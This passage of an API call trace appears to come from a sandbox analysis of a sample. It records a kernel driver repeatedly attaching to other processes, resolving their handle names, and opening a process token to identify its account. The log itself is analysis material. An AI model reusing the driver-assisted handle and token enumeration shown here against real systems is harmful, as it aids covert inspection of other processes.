(Object=0xffffe00069e41790) returned 0x7ffc [0289.967] IoCompleteRequest () returned 0x0 [0289.967] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.967] PsAcquireProcessExitSynchronization () returned 0x0 [0289.967] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.967] ObReferenceObjectByHandle (in: Handle=0x5c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00076f2d8f0, HandleInformation=0x0) returned 0x0 [0289.967] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.967] PsReleaseProcessExitSynchronization () returned 0x2 [0289.967] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffef [0289.968] ObQueryNameString (in: Object=0xffffe00076f2d8f0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.968] ObfDereferenceObject (Object=0xffffe00076f2d8f0) returned 0x800e [0289.968] IoCompleteRequest () returned 0x0 [0289.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.968] PsAcquireProcessExitSynchronization () returned 0x0 [0289.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.968] ObReferenceObjectByHandle (in: Handle=0x5d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a47b9e0, HandleInformation=0x0) returned 0x0 [0289.968] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.968] PsReleaseProcessExitSynchronization () returned 0x2 [0289.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffee [0289.968] ObQueryNameString (in: Object=0xffffe0006a47b9e0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.968] ObfDereferenceObject (Object=0xffffe0006a47b9e0) returned 0x7ffe [0289.968] IoCompleteRequest () returned 0x0 [0289.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.968] PsAcquireProcessExitSynchronization () returned 0x0 [0289.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.968] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a62a820, HandleInformation=0x0) returned 0x0 [0289.968] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.968] PsReleaseProcessExitSynchronization () returned 0x2 [0289.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffed [0289.968] ObQueryNameString (in: Object=0xffffe0006a62a820, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.968] ObfDereferenceObject (Object=0xffffe0006a62a820) returned 0x7ffe [0289.968] IoCompleteRequest () returned 0x0 [0289.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.968] PsAcquireProcessExitSynchronization () returned 0x0 [0289.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.968] ObReferenceObjectByHandle (in: Handle=0x634, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4809e0, HandleInformation=0x0) returned 0x0 [0289.968] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.968] PsReleaseProcessExitSynchronization () returned 0x2 [0289.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffec [0289.968] ObQueryNameString (in: Object=0xffffe0006a4809e0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.968] ObfDereferenceObject (Object=0xffffe0006a4809e0) returned 0x7ffc [0289.968] IoCompleteRequest () returned 0x0 [0289.968] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.968] PsAcquireProcessExitSynchronization () returned 0x0 [0289.968] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.968] ObReferenceObjectByHandle (in: Handle=0x64c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a53ef20, HandleInformation=0x0) returned 0x0 [0289.968] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.968] PsReleaseProcessExitSynchronization () returned 0x2 [0289.968] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffeb [0289.969] ObQueryNameString (in: Object=0xffffe0006a53ef20, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.969] ObfDereferenceObject (Object=0xffffe0006a53ef20) returned 0x7ffb [0289.969] IoCompleteRequest () returned 0x0 [0289.969] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.969] PsAcquireProcessExitSynchronization () returned 0x0 [0289.969] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0289.969] ObReferenceObjectByHandle (in: Handle=0x650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a323770, HandleInformation=0x0) returned 0x0 [0289.969] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.969] PsReleaseProcessExitSynchronization () returned 0x2 [0289.969] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x3ffea [0289.969] ObQueryNameString (in: Object=0xffffe0006a323770, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.969] ObfDereferenceObject (Object=0xffffe0006a323770) returned 0x7ffb [0289.969] IoCompleteRequest () returned 0x0 [0289.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x44c) returned 0x188 [0289.969] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.969] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069990840, HandleInformation=0x0) returned 0x0 [0289.969] ObOpenObjectByPointer (in: Object=0xffffe00069990840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.969] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x48000 [0289.969] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.969] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.969] IoCompleteRequest () returned 0x0 [0289.969] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.969] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.970] CloseHandle (hObject=0x18c) returned 1 [0289.970] CloseHandle (hObject=0x188) returned 1 [0289.970] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.970] PsAcquireProcessExitSynchronization () returned 0x0 [0289.970] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.970] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069991f20, HandleInformation=0x0) returned 0x0 [0289.970] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.970] PsReleaseProcessExitSynchronization () returned 0x2 [0289.970] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fffe [0289.970] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.970] ObfDereferenceObject (Object=0xffffe00069991f20) returned 0x7ffe [0289.970] IoCompleteRequest () returned 0x0 [0289.970] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.970] PsAcquireProcessExitSynchronization () returned 0x0 [0289.970] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.970] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699994c0, HandleInformation=0x0) returned 0x0 [0289.970] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.970] PsReleaseProcessExitSynchronization () returned 0x2 [0289.970] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fffd [0289.970] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.970] ObfDereferenceObject (Object=0xffffe000699994c0) returned 0x7ffb [0289.970] IoCompleteRequest () returned 0x0 [0289.970] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.970] PsAcquireProcessExitSynchronization () returned 0x0 [0289.970] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.970] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699999a0, HandleInformation=0x0) returned 0x0 [0289.970] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.970] PsReleaseProcessExitSynchronization () returned 0x2 [0289.970] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fffc [0289.970] ObQueryNameString (in: Object=0xffffe000699999a0, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.970] ObfDereferenceObject (Object=0xffffe000699999a0) returned 0x7ffe [0289.970] IoCompleteRequest () returned 0x0 [0289.970] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.970] PsAcquireProcessExitSynchronization () returned 0x0 [0289.971] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.971] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699d7090, HandleInformation=0x0) returned 0x0 [0289.971] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.971] PsReleaseProcessExitSynchronization () returned 0x2 [0289.971] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fffb [0289.971] ObQueryNameString (in: Object=0xffffe000699d7090, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.971] ObfDereferenceObject (Object=0xffffe000699d7090) returned 0x7ff9 [0289.971] IoCompleteRequest () returned 0x0 [0289.971] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.971] PsAcquireProcessExitSynchronization () returned 0x0 [0289.971] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.971] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bcf20, HandleInformation=0x0) returned 0x0 [0289.971] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.971] PsReleaseProcessExitSynchronization () returned 0x2 [0289.971] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fffa [0289.971] ObQueryNameString (in: Object=0xffffe00068bd4b90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.971] ObfDereferenceObject (Object=0xffffe000699bcf20) returned 0x7f77 [0289.971] IoCompleteRequest () returned 0x0 [0289.971] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.971] PsAcquireProcessExitSynchronization () returned 0x0 [0289.971] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.971] ObReferenceObjectByHandle (in: Handle=0x13c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bdcb0, HandleInformation=0x0) returned 0x0 [0289.971] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.971] PsReleaseProcessExitSynchronization () returned 0x2 [0289.971] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff9 [0289.971] ObQueryNameString (in: Object=0xffffe00068bd4b90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.971] ObfDereferenceObject (Object=0xffffe000699bdcb0) returned 0x7ffd [0289.971] IoCompleteRequest () returned 0x0 [0289.971] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.971] PsAcquireProcessExitSynchronization () returned 0x0 [0289.971] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.971] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bb1c0, HandleInformation=0x0) returned 0x0 [0289.971] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.971] PsReleaseProcessExitSynchronization () returned 0x2 [0289.971] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff8 [0289.971] ObQueryNameString (in: Object=0xffffe00068bcf590, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.971] ObfDereferenceObject (Object=0xffffe000699bb1c0) returned 0x7fff [0289.971] IoCompleteRequest () returned 0x0 [0289.971] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.971] PsAcquireProcessExitSynchronization () returned 0x0 [0289.971] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.971] ObReferenceObjectByHandle (in: Handle=0x144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bb540, HandleInformation=0x0) returned 0x0 [0289.971] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.971] PsReleaseProcessExitSynchronization () returned 0x2 [0289.971] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff7 [0289.971] ObQueryNameString (in: Object=0xffffe00068bd4600, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.972] ObfDereferenceObject (Object=0xffffe000699bb540) returned 0x7fff [0289.972] IoCompleteRequest () returned 0x0 [0289.972] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.972] PsAcquireProcessExitSynchronization () returned 0x0 [0289.972] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.972] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bb3d0, HandleInformation=0x0) returned 0x0 [0289.972] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.972] PsReleaseProcessExitSynchronization () returned 0x2 [0289.972] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff6 [0289.972] ObQueryNameString (in: Object=0xffffe00068bd4890, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.972] ObfDereferenceObject (Object=0xffffe000699bb3d0) returned 0x7ffc [0289.972] IoCompleteRequest () returned 0x0 [0289.972] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.972] PsAcquireProcessExitSynchronization () returned 0x0 [0289.972] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.972] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699bd090, HandleInformation=0x0) returned 0x0 [0289.972] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.972] PsReleaseProcessExitSynchronization () returned 0x2 [0289.972] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff5 [0289.972] ObQueryNameString (in: Object=0xffffe000699bd090, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.972] ObfDereferenceObject (Object=0xffffe000699bd090) returned 0x7ffe [0289.972] IoCompleteRequest () returned 0x0 [0289.972] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.972] PsAcquireProcessExitSynchronization () returned 0x0 [0289.972] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.972] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699c0900, HandleInformation=0x0) returned 0x0 [0289.972] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.972] PsReleaseProcessExitSynchronization () returned 0x2 [0289.972] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff4 [0289.972] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.972] ObfDereferenceObject (Object=0xffffe000699c0900) returned 0x7ffe [0289.972] IoCompleteRequest () returned 0x0 [0289.972] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.972] PsAcquireProcessExitSynchronization () returned 0x0 [0289.972] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.972] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699cd470, HandleInformation=0x0) returned 0x0 [0289.972] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.972] PsReleaseProcessExitSynchronization () returned 0x2 [0289.972] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff3 [0289.972] ObQueryNameString (in: Object=0xffffe000699cd470, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.972] ObfDereferenceObject (Object=0xffffe000699cd470) returned 0x7ffa [0289.972] IoCompleteRequest () returned 0x0 [0289.972] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.972] PsAcquireProcessExitSynchronization () returned 0x0 [0289.973] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.973] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699d7280, HandleInformation=0x0) returned 0x0 [0289.973] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.973] PsReleaseProcessExitSynchronization () returned 0x2 [0289.973] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff2 [0289.973] ObQueryNameString (in: Object=0xffffe000699d7280, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.973] ObfDereferenceObject (Object=0xffffe000699d7280) returned 0x7ffe [0289.973] IoCompleteRequest () returned 0x0 [0289.973] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.973] PsAcquireProcessExitSynchronization () returned 0x0 [0289.973] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.973] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699d5d10, HandleInformation=0x0) returned 0x0 [0289.973] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.973] PsReleaseProcessExitSynchronization () returned 0x2 [0289.973] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff1 [0289.973] ObQueryNameString (in: Object=0xffffe000699d5d10, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.973] ObfDereferenceObject (Object=0xffffe000699d5d10) returned 0x7fa9 [0289.973] IoCompleteRequest () returned 0x0 [0289.973] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.973] PsAcquireProcessExitSynchronization () returned 0x0 [0289.973] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.973] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699ffce0, HandleInformation=0x0) returned 0x0 [0289.973] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.973] PsReleaseProcessExitSynchronization () returned 0x2 [0289.973] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3fff0 [0289.973] ObQueryNameString (in: Object=0xffffe000699ffce0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.973] ObfDereferenceObject (Object=0xffffe000699ffce0) returned 0x7ccf [0289.973] IoCompleteRequest () returned 0x0 [0289.973] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.973] PsAcquireProcessExitSynchronization () returned 0x0 [0289.973] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.973] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: 